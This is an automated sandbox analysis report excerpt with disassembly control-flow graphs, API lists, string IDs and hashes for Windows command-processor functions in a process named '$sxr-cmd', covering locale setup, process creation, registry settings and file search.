                                                                                                                      • Opcode ID: a6a58be8637e266a7619168a34d09a9f7236abb5197162b465aafe4d5ad54b4e
                                                                                                                      • Instruction ID: d146bf741067b64ba0c05be071ec1723fe97f07d8b27d4e954a48ff26c839962
                                                                                                                      • Opcode Fuzzy Hash: a6a58be8637e266a7619168a34d09a9f7236abb5197162b465aafe4d5ad54b4e
                                                                                                                      • Instruction Fuzzy Hash: BB22C529A08E43C6EB549F299454279E6A1EF49FB4F498036CA0EC77B5DF7CAC44C350
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 398 7ff6155051ec-7ff615505248 call 7ff615505508 GetLocaleInfoW 401 7ff61550524e-7ff615505272 GetLocaleInfoW 398->401 402 7ff61550ef32-7ff61550ef3c 398->402 403 7ff615505295-7ff6155052b9 GetLocaleInfoW 401->403 404 7ff615505274-7ff61550527a 401->404 405 7ff61550ef3f-7ff61550ef49 402->405 408 7ff6155052de-7ff615505305 GetLocaleInfoW 403->408 409 7ff6155052bb-7ff6155052c3 403->409 406 7ff615505280-7ff615505286 404->406 407 7ff6155054f7-7ff6155054f9 404->407 410 7ff61550ef4b-7ff61550ef52 405->410 411 7ff61550ef61-7ff61550ef6c 405->411 406->407 412 7ff61550528c-7ff61550528f 406->412 407->402 415 7ff615505321-7ff615505343 GetLocaleInfoW 408->415 416 7ff615505307-7ff61550531b 408->416 413 7ff6155052c9-7ff6155052d7 409->413 414 7ff61550ef75-7ff61550ef78 409->414 410->411 417 7ff61550ef54-7ff61550ef5f 410->417 411->414 412->403 413->408 420 7ff61550ef99-7ff61550efa3 414->420 421 7ff61550ef7a-7ff61550ef7d 414->421 418 7ff61550efaf-7ff61550efb9 415->418 419 7ff615505349-7ff61550536e GetLocaleInfoW 415->419 416->415 417->405 417->411 423 7ff61550efbc-7ff61550efc6 418->423 424 7ff615505374-7ff615505396 GetLocaleInfoW 419->424 425 7ff61550eff2-7ff61550effc 419->425 420->418 421->408 422 7ff61550ef83-7ff61550ef8d 421->422 422->420 426 7ff61550efc8-7ff61550efcf 423->426 427 7ff61550efde-7ff61550efe9 423->427 429 7ff61550539c-7ff6155053be GetLocaleInfoW 424->429 430 7ff61550f035-7ff61550f03f 424->430 428 7ff61550efff-7ff61550f009 425->428 426->427 432 7ff61550efd1-7ff61550efdc 426->432 427->425 433 7ff61550f00b-7ff61550f012 428->433 434 7ff61550f021-7ff61550f02c 428->434 435 7ff6155053c4-7ff6155053e6 GetLocaleInfoW 429->435 436 7ff61550f078-7ff61550f082 429->436 431 7ff61550f042-7ff61550f04c 430->431 437 7ff61550f04e-7ff61550f055 431->437 438 7ff61550f064-7ff61550f06f 431->438 432->423 432->427 433->434 440 7ff61550f014-7ff61550f01f 433->440 434->430 441 7ff61550f0bb-7ff61550f0c5 435->441 442 7ff6155053ec-7ff61550540e GetLocaleInfoW 435->442 439 7ff61550f085-7ff61550f08f 436->439 437->438 443 7ff61550f057-7ff61550f062 437->443 438->436 444 7ff61550f0a7-7ff61550f0b2 439->444 445 7ff61550f091-7ff61550f098 439->445 440->428 440->434 446 7ff61550f0c8-7ff61550f0d2 441->446 447 7ff615505414-7ff615505436 GetLocaleInfoW 442->447 448 7ff61550f0fe-7ff61550f108 442->448 443->431 443->438 444->441 445->444 452 7ff61550f09a-7ff61550f0a5 445->452 453 7ff61550f0ea-7ff61550f0f5 446->453 454 7ff61550f0d4-7ff61550f0db 446->454 449 7ff61550543c-7ff61550545e GetLocaleInfoW 447->449 450 7ff61550f141-7ff61550f14b 447->450 451 7ff61550f10b-7ff61550f115 448->451 455 7ff615505464-7ff615505486 GetLocaleInfoW 449->455 456 7ff61550f184-7ff61550f18b 449->456 459 7ff61550f14e-7ff61550f158 450->459 457 7ff61550f117-7ff61550f11e 451->457 458 7ff61550f12d-7ff61550f138 451->458 452->439 452->444 453->448 454->453 460 7ff61550f0dd-7ff61550f0e8 454->460 461 7ff61550548c-7ff6155054ae GetLocaleInfoW 455->461 462 7ff61550f1c4-7ff61550f1ce 455->462 466 7ff61550f18e-7ff61550f198 456->466 457->458 463 7ff61550f120-7ff61550f12b 457->463 458->450 464 7ff61550f15a-7ff61550f161 459->464 465 7ff61550f170-7ff61550f17b 459->465 460->446 460->453 469 7ff61550f207-7ff61550f20e 461->469 470 7ff6155054b4-7ff6155054f5 setlocale call 7ff615508f80 461->470 471 7ff61550f1d1-7ff61550f1db 462->471 463->451 463->458 464->465 472 7ff61550f163-7ff61550f16e 464->472 465->456 467 7ff61550f19a-7ff61550f1a1 466->467 468 7ff61550f1b0-7ff61550f1bb 466->468 467->468 473 7ff61550f1a3-7ff61550f1ae 467->473 468->462 477 7ff61550f211-7ff61550f21b 469->477 475 7ff61550f1dd-7ff61550f1e4 471->475 476 7ff61550f1f3-7ff61550f1fe 471->476 472->459 472->465 473->466 473->468 475->476 479 7ff61550f1e6-7ff61550f1f1 475->479 476->469 480 7ff61550f21d-7ff61550f224 477->480 481 7ff61550f233-7ff61550f23e 477->481 479->471 479->476 480->481 482 7ff61550f226-7ff61550f231 480->482 482->477 482->481
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoLocale$DefaultLangUsersetlocale
                                                                                                                      • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                                                                                      • API String ID: 2492766124-2236139042
                                                                                                                      • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                                                      • Instruction ID: c7bb275156862b23c00f844e8319e9f7dfb6336e53bdbdde5b5e18d0aa6e3428
                                                                                                                      • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                                                      • Instruction Fuzzy Hash: 36F13069B08B4285EF218F21E5502B9A6A5BF44FA8F954136CA1DC77B4EF3CED05C300
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 483 7ff615504224-7ff6155042a5 InitializeProcThreadAttributeList 484 7ff6155042ab-7ff6155042e5 UpdateProcThreadAttribute 483->484 485 7ff61550ecd4-7ff61550ecee GetLastError call 7ff615519eec 483->485 487 7ff61550ecf0-7ff61550ed19 GetLastError call 7ff615519eec DeleteProcThreadAttributeList 484->487 488 7ff6155042eb-7ff6155043c6 memset * 2 GetStartupInfoW call 7ff615503a90 call 7ff6154fb900 484->488 492 7ff61550ed1e 485->492 487->492 497 7ff6155043cc-7ff6155043d3 488->497 498 7ff615504638-7ff615504644 _local_unwind 488->498 499 7ff615504649-7ff615504650 497->499 500 7ff6155043d9-7ff6155043dc 497->500 498->499 499->500 501 7ff615504656-7ff61550465d 499->501 502 7ff615504415-7ff615504424 call 7ff615505a68 500->502 503 7ff6155043de-7ff6155043f5 wcsrchr 500->503 501->502 504 7ff615504663 501->504 510 7ff61550442a-7ff615504486 CreateProcessW 502->510 511 7ff615504589-7ff615504590 502->511 503->502 506 7ff6155043f7-7ff61550440f lstrcmpW 503->506 504->500 506->502 507 7ff615504668-7ff61550466d call 7ff615519044 506->507 507->502 513 7ff61550448b-7ff61550448f 510->513 511->510 514 7ff615504596-7ff6155045fa CreateProcessAsUserW 511->514 515 7ff615504495-7ff6155044c0 CloseHandle call 7ff61550498c 513->515 516 7ff615504672-7ff615504682 GetLastError 513->516 514->513 518 7ff6155044c5-7ff6155044c7 515->518 519 7ff61550468d-7ff615504694 516->519 518->519 520 7ff6155044cd-7ff6155044e5 518->520 521 7ff6155046a2-7ff6155046ac 519->521 522 7ff615504696-7ff6155046a0 519->522 523 7ff6155047a3-7ff6155047a9 520->523 524 7ff6155044eb-7ff6155044f2 520->524 525 7ff6155046ae-7ff6155046b5 call 7ff6155097bc 521->525 526 7ff615504705-7ff615504707 521->526 522->521 522->525 528 7ff6155045ff-7ff615504607 524->528 529 7ff6155044f8-7ff615504507 524->529 541 7ff615504703 525->541 542 7ff6155046b7-7ff615504701 call 7ff61554c038 525->542 526->520 527 7ff61550470d-7ff61550472a call 7ff6154fcd90 526->527 543 7ff61550473d-7ff615504767 call 7ff6155013e0 call 7ff615519eec call 7ff6154fff70 _local_unwind 527->543 544 7ff61550472c-7ff615504738 _local_unwind 527->544 528->529 532 7ff61550460d 528->532 533 7ff615504612-7ff615504616 529->533 534 7ff61550450d-7ff61550455e call 7ff615505cb4 call 7ff6155033f0 call 7ff61550498c 529->534 537 7ff61550476c-7ff615504773 532->537 539 7ff61550461c-7ff615504633 533->539 540 7ff6155047d7-7ff6155047df 533->540 567 7ff615504564-7ff615504579 call 7ff61550498c 534->567 568 7ff6155047ae-7ff6155047ca call 7ff6155033f0 534->568 537->529 548 7ff615504779-7ff615504780 537->548 545 7ff6155047f2-7ff61550483c call 7ff6154fff70 DeleteProcThreadAttributeList call 7ff615508f80 539->545 540->545 546 7ff6155047e1-7ff6155047ed CloseHandle 540->546 541->526 542->526 543->537 544->543 546->545 548->529 553 7ff615504786-7ff615504789 548->553 553->529 555 7ff61550478f-7ff615504792 553->555 555->523 560 7ff615504794-7ff61550479d call 7ff61551a250 555->560 560->523 560->529 567->545 576 7ff61550457f-7ff615504584 call 7ff61551a920 567->576 568->540 576->545
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                                                                                                      • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                                                                                                                      • API String ID: 388421343-2905461000
                                                                                                                      • Opcode ID: 535aaf602069f04d29d01d66ec7cc0283b4951f0e7199f2144b325fbc8c0e2e4
                                                                                                                      • Instruction ID: 1a9eaf86f3c5d8b43d8a11a8c2a7fd20f13a8630c0f4ca2dabe52a99ab0d69b7
                                                                                                                      • Opcode Fuzzy Hash: 535aaf602069f04d29d01d66ec7cc0283b4951f0e7199f2144b325fbc8c0e2e4
                                                                                                                      • Instruction Fuzzy Hash: 85F11D3AA09E82C6EA60DB11E4507BAFBA4FB85FA4F454136D94DC2675DF3CE845CB00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 579 7ff615505554-7ff6155055b9 call 7ff61550a640 582 7ff6155055bc-7ff6155055e8 RegOpenKeyExW 579->582 583 7ff6155055ee-7ff615505631 RegQueryValueExW 582->583 584 7ff615505887-7ff61550588e 582->584 585 7ff61550f248-7ff61550f24d 583->585 586 7ff615505637-7ff615505675 RegQueryValueExW 583->586 584->582 587 7ff615505894-7ff6155058db time srand call 7ff615508f80 584->587 591 7ff61550f24f-7ff61550f25b 585->591 592 7ff61550f260-7ff61550f265 585->592 588 7ff61550568e-7ff6155056cc RegQueryValueExW 586->588 589 7ff615505677-7ff61550567c 586->589 596 7ff61550f2b6-7ff61550f2bb 588->596 597 7ff6155056d2-7ff615505710 RegQueryValueExW 588->597 594 7ff615505682-7ff615505687 589->594 595 7ff61550f28b-7ff61550f290 589->595 591->586 592->586 593 7ff61550f26b-7ff61550f286 _wtol 592->593 593->586 594->588 595->588 599 7ff61550f296-7ff61550f2b1 _wtol 595->599 600 7ff61550f2bd-7ff61550f2c9 596->600 601 7ff61550f2ce-7ff61550f2d3 596->601 602 7ff615505712-7ff615505717 597->602 603 7ff615505729-7ff615505767 RegQueryValueExW 597->603 599->588 600->597 601->597 604 7ff61550f2d9-7ff61550f2f4 _wtol 601->604 605 7ff61550f2f9-7ff61550f2fe 602->605 606 7ff61550571d-7ff615505722 602->606 607 7ff61550579f-7ff6155057dd RegQueryValueExW 603->607 608 7ff615505769-7ff61550576e 603->608 604->597 605->603 611 7ff61550f304-7ff61550f31a wcstol 605->611 606->603 609 7ff6155057e3-7ff6155057e8 607->609 610 7ff61550f3a9 607->610 612 7ff615505774-7ff61550578f 608->612 613 7ff61550f320-7ff61550f325 608->613 614 7ff6155057ee-7ff615505809 609->614 615 7ff61550f363-7ff61550f368 609->615 624 7ff61550f3b5-7ff61550f3b8 610->624 611->613 618 7ff615505795-7ff615505799 612->618 619 7ff61550f357-7ff61550f35e 612->619 616 7ff61550f327-7ff61550f33f wcstol 613->616 617 7ff61550f34b 613->617 622 7ff61550f39a-7ff61550f39d 614->622 623 7ff61550580f-7ff615505813 614->623 620 7ff61550f36a-7ff61550f382 wcstol 615->620 621 7ff61550f38e 615->621 616->617 617->619 618->607 618->619 619->607 620->621 621->622 622->610 623->622 625 7ff615505819-7ff615505823 623->625 626 7ff61550f3be-7ff61550f3c5 624->626 627 7ff61550582c 624->627 625->624 628 7ff615505829 625->628 629 7ff615505832-7ff615505870 RegQueryValueExW 626->629 627->629 630 7ff61550f3ca-7ff61550f3d1 627->630 628->627 631 7ff61550f3dd-7ff61550f3e2 629->631 632 7ff615505876-7ff615505882 RegCloseKey 629->632 630->631 633 7ff61550f433-7ff61550f439 631->633 634 7ff61550f3e4-7ff61550f412 ExpandEnvironmentStringsW 631->634 632->584 633->632 635 7ff61550f43f-7ff61550f44c call 7ff6154fb900 633->635 636 7ff61550f428 634->636 637 7ff61550f414-7ff61550f426 call 7ff6155013e0 634->637 635->632 639 7ff61550f42e 636->639 637->639 639->633
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: QueryValue$CloseOpensrandtime
                                                                                                                      • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                                                                                      • API String ID: 145004033-3846321370
                                                                                                                      • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                                                      • Instruction ID: 62c83af0b90467dfc1e8ac8d8509e1bf25ec45b9c9a53301db2a69a8a7b1eae7
                                                                                                                      • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                                                      • Instruction Fuzzy Hash: F6E1423A51DE82C6E7508B20E45057AF7A0FB89F69F445136EA8EC2A78DF7CD945CB00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 821 7ff6155037d8-7ff615503887 GetCurrentThreadId OpenThread call 7ff6155004f4 HeapSetInformation RegOpenKeyExW 824 7ff61550e9f8-7ff61550ea3b RegQueryValueExW RegCloseKey 821->824 825 7ff61550388d-7ff6155038eb call 7ff615505920 GetConsoleOutputCP GetCPInfo 821->825 827 7ff61550ea41-7ff61550ea59 GetThreadLocale 824->827 825->827 831 7ff6155038f1-7ff615503913 memset 825->831 829 7ff61550ea5b-7ff61550ea67 827->829 830 7ff61550ea74-7ff61550ea77 827->830 829->830 834 7ff61550ea79-7ff61550ea7d 830->834 835 7ff61550ea94-7ff61550ea96 830->835 832 7ff615503919-7ff615503935 call 7ff615504d5c 831->832 833 7ff61550eaa5 831->833 841 7ff61550393b-7ff615503942 832->841 842 7ff61550eae2-7ff61550eaff call 7ff6154f3240 call 7ff615518530 call 7ff615504c1c 832->842 838 7ff61550eaa8-7ff61550eab4 833->838 834->835 837 7ff61550ea7f-7ff61550ea89 834->837 835->833 837->835 838->832 840 7ff61550eaba-7ff61550eac3 838->840 843 7ff61550eacb-7ff61550eace 840->843 844 7ff61550eb27-7ff61550eb40 _setjmp 841->844 845 7ff615503948-7ff615503962 _setjmp 841->845 850 7ff61550eb00-7ff61550eb0d 842->850 846 7ff61550ead0-7ff61550eadb 843->846 847 7ff61550eac5-7ff61550eac9 843->847 852 7ff61550eb46-7ff61550eb49 844->852 853 7ff6155039fe-7ff615503a05 call 7ff615504c1c 844->853 845->850 851 7ff615503968-7ff61550396d 845->851 846->838 854 7ff61550eadd 846->854 847->843 863 7ff61550eb15-7ff61550eb1f call 7ff615504c1c 850->863 856 7ff61550396f 851->856 857 7ff6155039b9-7ff6155039bb 851->857 859 7ff61550eb66-7ff61550eb6f call 7ff6155001b8 852->859 860 7ff61550eb4b-7ff61550eb65 call 7ff6154f3240 call 7ff615518530 call 7ff615504c1c 852->860 853->824 854->832 864 7ff615503972-7ff61550397d 856->864 867 7ff6155039c1-7ff6155039c8 call 7ff615504c1c 857->867 868 7ff61550eb20 857->868 880 7ff61550eb87-7ff61550eb89 call 7ff6155086f0 859->880 881 7ff61550eb71-7ff61550eb82 _setmode 859->881 860->859 863->868 873 7ff61550397f-7ff615503984 864->873 874 7ff6155039c9-7ff6155039de call 7ff6154fdf60 864->874 867->874 868->844 873->864 883 7ff615503986-7ff6155039b3 call 7ff615500580 GetConsoleOutputCP GetCPInfo call 7ff6155004f4 873->883 874->863 889 7ff6155039e4-7ff6155039e8 874->889 890 7ff61550eb8e-7ff61550ebad call 7ff6155058e4 call 7ff6154fdf60 880->890 881->880 883->857 889->853 893 7ff6155039ea-7ff6155039ef call 7ff6154fbe00 889->893 902 7ff61550ebaf-7ff61550ebb3 890->902 899 7ff6155039f4-7ff6155039fc 893->899 899->873 902->853 903 7ff61550ebb9-7ff61550ec24 call 7ff6155058e4 GetConsoleOutputCP GetCPInfo call 7ff6155004f4 call 7ff6154fbe00 call 7ff615500580 GetConsoleOutputCP GetCPInfo call 7ff6155004f4 902->903 903->890
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                                                                                                      • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                                                                                      • API String ID: 2624720099-1920437939
                                                                                                                      • Opcode ID: 07c46770a52c088c526de068ad2c2e0dd476b9e56bbee4b4c828f5b21f9523cf
                                                                                                                      • Instruction ID: f1cd82317c1d7db7b1e7c49ee7722f8d8ff65aea2d878c84ddd909f436c24570
                                                                                                                      • Opcode Fuzzy Hash: 07c46770a52c088c526de068ad2c2e0dd476b9e56bbee4b4c828f5b21f9523cf
                                                                                                                      • Instruction Fuzzy Hash: B2C1CF39E08E428AFB549B3494511B9FAA0FF49F78F55413AD90EC6AB2DF3CAC458700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1118 7ff61550823c-7ff61550829b FindFirstFileExW 1119 7ff6155082cd-7ff6155082df 1118->1119 1120 7ff61550829d-7ff6155082a9 GetLastError 1118->1120 1124 7ff615508365-7ff61550837b FindNextFileW 1119->1124 1125 7ff6155082e5-7ff6155082ee 1119->1125 1121 7ff6155082af 1120->1121 1122 7ff6155082b1-7ff6155082cb 1121->1122 1126 7ff61550837d-7ff615508380 1124->1126 1127 7ff6155083d0-7ff6155083e5 FindClose 1124->1127 1128 7ff6155082f1-7ff6155082f4 1125->1128 1126->1119 1129 7ff615508386 1126->1129 1127->1128 1130 7ff6155082f6-7ff615508300 1128->1130 1131 7ff615508329-7ff61550832b 1128->1131 1129->1120 1132 7ff615508332-7ff615508353 GetProcessHeap HeapAlloc 1130->1132 1133 7ff615508302-7ff61550830e 1130->1133 1131->1121 1134 7ff61550832d 1131->1134 1137 7ff615508356-7ff615508363 1132->1137 1135 7ff61550838b-7ff6155083c2 GetProcessHeap HeapReAlloc 1133->1135 1136 7ff615508310-7ff615508313 1133->1136 1134->1120 1138 7ff6155150f8-7ff61551511e GetLastError FindClose 1135->1138 1139 7ff6155083c8-7ff6155083ce 1135->1139 1140 7ff615508327 1136->1140 1141 7ff615508315-7ff615508323 1136->1141 1137->1136 1138->1122 1139->1137 1140->1131 1141->1140
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFileFindFirstLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 873889042-0
                                                                                                                      • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                                                      • Instruction ID: 871bbf5850d6fb1d2945bb06bfb6c2891c4c769ce2bb32b985d9b30e3f2c9531
                                                                                                                      • Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                                                      • Instruction Fuzzy Hash: 0B511D39A09F42C6E7408B11E454579FBA4FB8AFA5F499132CA5E83361DF3CE8548700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1142 7ff615502978-7ff6155029b6 1143 7ff6155029b9-7ff6155029c1 1142->1143 1143->1143 1144 7ff6155029c3-7ff6155029c5 1143->1144 1145 7ff6155029cb-7ff6155029cf 1144->1145 1146 7ff61550e441 1144->1146 1147 7ff6155029d2-7ff6155029da 1145->1147 1148 7ff615502a1e-7ff615502a3e FindFirstFileW 1147->1148 1149 7ff6155029dc-7ff6155029e1 1147->1149 1151 7ff615502a44-7ff615502a5c FindClose 1148->1151 1152 7ff61550e435-7ff61550e439 1148->1152 1149->1148 1150 7ff6155029e3-7ff6155029eb 1149->1150 1150->1147 1153 7ff6155029ed-7ff615502a1c call 7ff615508f80 1150->1153 1154 7ff615502ae3-7ff615502ae5 1151->1154 1155 7ff615502a62-7ff615502a6e 1151->1155 1152->1146 1156 7ff61550e3f7-7ff61550e3ff 1154->1156 1157 7ff615502aeb-7ff615502b10 _wcsnicmp 1154->1157 1159 7ff615502a70-7ff615502a78 1155->1159 1157->1155 1160 7ff615502b16-7ff61550e3f1 _wcsicmp 1157->1160 1159->1159 1162 7ff615502a7a-7ff615502a8d 1159->1162 1160->1155 1160->1156 1162->1146 1163 7ff615502a93-7ff615502a97 1162->1163 1165 7ff615502a9d-7ff615502ade memmove call 7ff6155013e0 1163->1165 1166 7ff61550e404-7ff61550e407 1163->1166 1165->1150 1168 7ff61550e40b-7ff61550e413 1166->1168 1168->1168 1170 7ff61550e415-7ff61550e42b memmove 1168->1170 1170->1152
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                                                      • Instruction ID: 66b32be509cca29c5df98f217fdb8c02f1cc421bec29cd09510101d816db37c8
                                                                                                                      • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                                                      • Instruction Fuzzy Hash: 7D51D765B08A8285EA708F15E5442BAE690FB54FF8F954232DE6EC76F1DF3CE8458700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
